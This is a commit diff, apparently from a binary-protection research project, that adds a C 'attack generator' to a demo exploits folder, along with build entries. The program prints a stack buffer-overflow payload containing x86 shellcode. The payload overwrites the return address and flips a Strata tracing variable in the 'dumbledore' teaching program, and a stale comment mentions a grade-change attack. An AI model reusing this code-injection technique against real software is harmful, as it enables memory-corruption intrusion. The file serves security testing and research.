Code injection attack generator for attacking strata_tracing variable in Strata.

.gitattributes

@@ -7,6 +7,7 @@ demos/demo.jan_21_2011/dumbledore.c -text
 demos/demo.jan_21_2011/dumbledore.exploits/Makefile -text
 demos/demo.jan_21_2011/dumbledore.exploits/attack-gradeA.no_strata.c -text
 demos/demo.jan_21_2011/dumbledore.exploits/attack-gradeB.no_strata.c -text
+demos/demo.jan_21_2011/dumbledore.exploits/attack-strata_tracing.c -text
 demos/demo.jan_21_2011/dumbledore.exploits/badA.txt -text
 demos/demo.jan_21_2011/dumbledore.exploits/badB.txt -text
 demos/demo.jan_21_2011/dumbledore.good_inputs/good.txt -text

demos/demo.jan_21_2011/dumbledore.exploits/Makefile

@@ -4,9 +4,12 @@
 #		application
 #	The attack generator for stratafied application may need 
 #		to be slightly different
-PS_TOOLBASE=../../tools
+PS_TOOLBASE=${PEASOUP_HOME}/tools
 
-all: attack-gradeA attack-gradeB
+all: attack-gradeA attack-gradeB attack-strata_tracing
+
+attack-strata_tracing: attack-strata_tracing.o
+	${PS_TOOLBASE}/ps_link.sh attack-strata_tracing.o -o attack-strata_tracing
 
 attack-gradeA.no_strata: attack-gradeA.no_strata.o
 	${PS_TOOLBASE}/ps_link.sh attack-gradeA.no_strata.o -o gradeA.no_strata

demos/demo.jan_21_2011/dumbledore.exploits/attack-strata_tracing.c

+#include <stdio.h>
+#include <string.h>
+
+/* This attack generator crafts a code injection attack which 
+ *	changes one of Strata's memory locations.  In this instance
+ *	strata_tracing will be changed to a value of 1
+ *	which will turn on tracing output
+ */ 
+                                      /* stack location address */
+char attackString[] =
+    "Ja"		   /* 0xbfffefa6 */ /* Name: 0x80c80c0 */
+    "ck D"                 /* 0xbfffefa8 */ /* Name: 0x80c80c2 */
+    "avid"                 /* 0xbfffefac */ /* Name: 0x80c80c6 */
+    "son\x00"              /* 0xbfffefb0 */ /* Name: 0x80c80ca */
+    "\xc6\x05\x00\xe2"     /* 0xbfffefb4 */ /* Name: 0x80c80ce */ /* movb 0x1,0x080c6008 addr of strata_tracing */
+    "\x33\x09\x01\x90"     /* 0xbfffefb8 */ /* nop is \x90 */ 
+    "\x68\xf7\x82\x04"     /* 0xbfffefbc */ /* op 68 is push ret addr 0x080482f7 */
+    "\x08\x90\xc3\x3e"     /* 0xbfffefc0 */	/* nop is \x90; c3 is ret inst */ 
+    "\x20\x20\x20\x20"     /* 0xbfffefc4 */
+    "\x20\x20\x20\x20"     /* 0xbfffefc8 */
+    "\x20\x20\x20\x20"     /* 0xbfffefcc */
+    "\x20\x20\x20\x20"     /* 0xbfffefd0 */
+    "\x20\x20\x20\x20"     /* 0xbfffefd4 */
+    "\x20\x20\x20\x20"     /* 0xbfffefd8 */
+    "\x20\x20\x20\x20"     /* 0xbfffefdc */
+    "\x20\x20\x20\x20"     /* 0xbfffefe0 */
+    "\x20\x20\x20\x20"     /* 0xbfffefe4 */
+    "\x20\x20\x20\x20"     /* 0xbfffefe8 */
+    "\x20\x20\x20\x20"     /* 0xbfffefec */
+    "\x20\x20\x20\x20"     /* 0xbfffeff0 */
+    "\x20\x20\x20\x20"     /* 0xbfffeff4 */
+    "\x20\x20\x20\x20"     /* 0xbfffeff8 */
+    "\x20\x20\x20\x20"     /* 0xbfffeffc */
+    "\x20\x20\x20\x20"     /* 0xbffff000 */
+    "\x20\x20\x20\x20"     /* 0xbffff004 */
+    "\x62\x00\x00\x00"     /* 0xbffff008 */	/* i here */
+    "\x20\x20\x20\x20"     /* 0xbffff00c */ 	/* c here */
+    "\x20\x20\x20\x20"     /* 0xbffff010 */
+    "\x20\x20\x20\x20"     /* 0xbffff014 */
+    "\x38\xf0\xff\xbf"     /* 0xbffff018 */	/* ebp  aka frame ptr */
+    "\xce\x80\x0c\x08"     /* 0xbffff01c */	/* return address should b
+							the addr of Name 
+							where injection code is
+							0x80c80ce */
+    "\xc0\x80\x0c\x08"     /* 0xbffff020 */ 	/* address of Name */ 
+    "\x0a\x0a\x0a\x0a" ;    /* 0xbffff024 */
+/* The key to the attack is to change the return address (located on the
+   stack at address 0x22cc7c as indicated in the above picture to
+   point to the code location in main where the grade is set to a "B".
+   However, it is also important for the buffer overrun to preserve the
+   frame pointer and the address of grade on the stack (grade is passed and s
+   points to it
+*/
+
+
+int main() {
+   int i;
+   char *p = attackString;
+   for (i = 0; i < sizeof(attackString); i++) {
+      putchar(*p);
+      p++;
+   }
+   return 1;
+}